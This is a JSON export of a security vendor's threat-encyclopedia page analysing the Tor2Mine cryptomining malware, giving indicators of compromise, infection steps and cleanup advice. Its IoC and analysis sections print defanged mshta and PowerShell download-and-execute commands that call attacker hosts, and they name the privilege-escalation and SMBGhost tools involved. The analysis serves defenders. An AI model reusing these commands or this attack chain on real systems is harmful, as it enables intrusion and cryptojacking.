{"id":1513,"date":"2024-02-27T11:44:09","date_gmt":"2024-02-27T11:44:09","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=1513"},"modified":"2024-04-22T12:48:24","modified_gmt":"2024-04-22T12:48:24","slug":"miner-win32-tor2mine","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2024\/02\/27\/miner-win32-tor2mine\/","title":{"rendered":"Miner.Win32.Tor2Mine"},"content":{"rendered":"<h2>Overview<\/h2>\n<p><strong>Type:<\/strong> Miner<br \/>\n<strong>Destruction Level:<\/strong> High<br \/>\n<strong>Prevalence:<\/strong> Moderate<\/p>\n<p>&nbsp;<\/p>\n<h3>Malware Name(s)<\/h3>\n<ul>\n<li>Miner.Win32.Tor2Mine (Padvish)<\/li>\n<li>Virtool.PowerShell\/Obfuscator.A (Kaspersky)<\/li>\n<li>PowerShell\/Agent.JJ (Eset)<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<h3>What is miner?<\/h3>\n<p>Miners are individuals or software that extracts cryptocurrencies through mining them. Bitcoin is a type of cryptocurrency and extracting bitcoin is a kind of data verification that is done in two complex stages of the SHA256 hash. Bitcoin network rewards extractors with bitcoin for their attempts to calculate complex calculations. Malware authors write malware to use the victim\u2019s system to mine bitcoin and not to pay for these calculations. These calculations will engage the CPU of the victim\u2019s system and slow down it.<\/p>\n<p>&nbsp;<\/p>\n<h3>What is Tor2Mine malware?<\/h3>\n<p>Tor2Mine Malware has the capability to self-replicate within a network. Upon infiltrating a victim&#8217;s system, its primary objective is to engage in cryptocurrency extraction. This malware exploits a variety of vulnerabilities within the system by remotely executing its predetermined code.<\/p>\n<p>&nbsp;<\/p>\n<h2>Technical Review<\/h2>\n<h3>Indicators of Compromise (IoC)<\/h3>\n<p>\u2714\ufe0f\u00a0The presence of a service titled &#8220;<strong><span style=\"color: #0000ff\">cli_optimization_v<\/span>&#8220;<\/strong> is detected, initiated with the command:<br \/>\n<span style=\"color: #0000ff\">-cmd \/c mshta hxxps:\/\/qlqd5zqefmkcr34a.onion.pet\/win\/checking.hta<\/span><\/p>\n<p>\u2714\ufe0f\u00a0Additionally, a scheduled task is identified, invoked with the command:<br \/>\n&#8211; <span style=\"color: #0000ff\">cmd mshta hxxp:\/\/asq.r77vh0.pw\/win\/checking.hta<\/span><\/p>\n<p>\u2714\ufe0f\u00a0Furthermore, files with the following names are found within the victim&#8217;s system:<\/p>\n<p><span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\Users\\MSSQLSERVER\\AppData\\Local\\Temp\\ potato.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\ProgramData\\Oracle\\Java\\java.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\ProgramData\\Oracle\\Java\\javaw.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0f%AppData%\\Microsoft\\del.ps1 <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\Windows\\Fonts\\del.ps1 <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0f%appdata%\\Microsoft\\Network\\PrivFalse.bat <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0f%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\javaw.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0f%programdata%\\Microsoft\\javaw.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\Windows\\del.ps1 <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\Windows\\del.bat <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\Windows\\services.exe <\/em><\/span><br \/>\n<span style=\"color: #0000ff\"><em>\u25aa\ufe0fC:\\ProgramData\\Oracle\\Java\\java.exe<\/em><\/span><\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Performance Description<\/strong><\/h3>\n<p>The malware gains entry into the victim system by exploiting vulnerabilities such as the SMBGhost or other potential weaknesses in the victim system&#8217;s SQL database services, or due to not implementing security policies regarding remote access rights, . Subsequently, the malware executes the following PowerShell command within the victim&#8217;s system:<\/p>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-3939 aligncenter\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2024\/02\/1-\u0639\u0645\u0644\u06a9\u0631\u062f-\u0628\u062f\u0627\u0641\u0632\u0627\u0631-Tor2Mine.png\" alt=\"\u0639\u0645\u0644\u06a9\u0631\u062f \u0628\u062f\u0627\u0641\u0632\u0627\u0631 Tor2Mine\" width=\"1201\" height=\"179\" \/><\/p>\n<p>&nbsp;<\/p>\n<p>Decoding the base64-encoded content from the above image corresponds to the following powershell command:<\/p>\n<p>&#8220;`powershell<br \/>\niex ((New-Object System.Net.WebClient).DownloadString(&#8220;hxxp:\/\/ff-emmersdorf-klagenfurt.at\/data\/start.ps1&#8221;))<br \/>\n&#8220;`<\/p>\n<p>This clearly indicates the malware&#8217;s intention to download and execute the <strong>start.ps1<\/strong> file.<\/p>\n<p>The content of the &#8220;start.ps1&#8221; file resembles the following code. Notably, the malware consistently deploys the <strong>base64<\/strong> algorithm in its regular process to obfuscate commands.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-3940 aligncenter\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2024\/02\/2-\u0645\u062d\u062a\u0648\u0627\u06cc-\u0641\u0627\u06cc\u0644-start.ps1.png\" alt=\" \u0645\u062d\u062a\u0648\u0627\u06cc \u0641\u0627\u06cc\u0644 start.ps1\" width=\"1149\" height=\"684\" \/><\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: justify\">Decoded content of the above commands, is as follows:<\/p>\n<p style=\"text-align: justify\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-3941 aligncenter\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2024\/02\/3-\u0645\u062d\u062a\u0648\u0627\u06cc-\u062f\u06cc\u06a9\u062f-\u0634\u062f\u0647-\u06a9\u062f-\u0628\u0627\u0644\u0627.png\" alt=\"\u0645\u062d\u062a\u0648\u0627\u06cc \u062f\u06cc\u06a9\u062f \u0634\u062f\u0647 \u06a9\u062f \u0628\u0627\u0644\u0627\" width=\"1139\" height=\"610\" \/><\/p>\n<p style=\"text-align: justify\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-3942 aligncenter\" src=\"http:\/\/threats.amnpardaz.com\/wp-content\/uploads\/sites\/2\/2024\/02\/4-\u0645\u062d\u062a\u0648\u0627\u06cc-\u062f\u06cc\u06a9\u062f-\u0634\u062f\u0647-\u06a9\u062f-\u0628\u0627\u0644\u0627.png\" alt=\"\u0645\u062d\u062a\u0648\u0627\u06cc \u062f\u06cc\u06a9\u062f \u0634\u062f\u0647 \u06a9\u062f \u0628\u0627\u0644\u0627\" width=\"1125\" height=\"582\" \/><\/p>\n<p>&nbsp;<\/p>\n<p><strong>The most important operations of the above commands are:<\/strong><\/p>\n<ul>\n<li>Running a tool that exploits the CVE-2020-796 vulnerability known as SMBGhost.<\/li>\n<li>Executing tools to escalating access level<\/li>\n<li>Downloading and executing the GoldBrute botnet<\/li>\n<li>Prolong malware persistence by placing the malicious<strong> javaw.exe<\/strong> file in the startup path and creating a scheduled task for this file\\<\/li>\n<\/ul>\n<p>Furthermore, the &#8220;start.ps1&#8221; file performs the following operations:<\/p>\n<ul>\n<li>Downloading a copy of the 7Zip program to extract the &#8220;java1.8&#8221; file and executing the &#8220;ServSVC.exe&#8221; file within that.<\/li>\n<li>Ensuring malware&#8217;s persistence by embedding a PowerShell command in a registry path.<\/li>\n<\/ul>\n<p style=\"text-align: justify\">?potato.exe<\/p>\n<p>Deploying the &#8220;potato.exe&#8221; file to escalate access level from Windows Service Accounts to &#8220;NT AUTHORITY\\SYSTEM&#8221;.<\/p>\n<p>The tool associated with these operations can be found at the following <a href=\"https:\/\/github.com\/ohpe\/juicy-potato\">GitHub<\/a> link:<a href=\"https:\/\/github.com\/ohpe\/juicy-potato\">(https:\/\/github.com\/ohpe\/juicy-potato).<\/a><\/p>\n<p dir=\"ltr\" style=\"text-align: justify\">?rpc.exe file<\/p>\n<p>Escalate access level through RpcSs service<br \/>\nEscalate access level from NT AUTHORITY\\network service to SYSTEM<br \/>\nEscalate access level from Administrator to SYSTEM<br \/>\nThe <a href=\"http:\/\/github.com\/sailay1996\/RpcSsImpersonator\">github<\/a> link of this tool:<\/p>\n<p><span style=\"color: #0000ff\">https:\/\/github.com\/sailay1996\/RpcSsImpersonator<\/span><\/p>\n<p>? ghost.exe file<br \/>\nDeploying the SMBGhost vulnerability with the ID CVE-2020-796, this file can execute its desired code remotely on the victim&#8217;s server. This vulnerability allows an attacker to execute commands without authentication by sending manipulated SMBv3 packets to the server.<\/p>\n<p>?\u00a0ServSVC.exe file<br \/>\nThis file is the GoldBrute botnet tool compiled by Java. Intruders use GoldBrut malware to perform brute-force operations to extract authentication information in the victim&#8217;s network.<\/p>\n<h2><\/h2>\n<h2 style=\"text-align: justify\">How to deal with and clean the system?<\/h2>\n<p style=\"text-align: justify\">Padvish detects this malware and removes it from the system. Padvish Intrusion Prevention System (IPS) also detects possible infections caused by Windows vulnerabilities and prevents them from entering the victim&#8217;s system.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview Type: Miner Destruction Level: High Prevalence: Moderate &nbsp; Malware Name(s) Miner.Win32.Tor2Mine (Padvish) Virtool.PowerShell\/Obfuscator.A (Kaspersky) PowerShell\/Agent.JJ (Eset) &nbsp; What is miner? Miners are individuals or software that extracts cryptocurrencies through mining them. Bitcoin is a type of cryptocurrency and extracting bitcoin is a kind of data verification that is done in two complex stages of&hellip;<\/p>\n","protected":false},"author":27,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[58,59,60],"class_list":["post-1513","post","type-post","status-publish","format-standard","hentry","category-miner","tag-miner-win32-tor2mine","tag-miner","tag-tor2mine"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1513","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/27"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=1513"}],"version-history":[{"count":5,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1513\/revisions"}],"predecessor-version":[{"id":1541,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1513\/revisions\/1541"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=1513"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=1513"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=1513"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}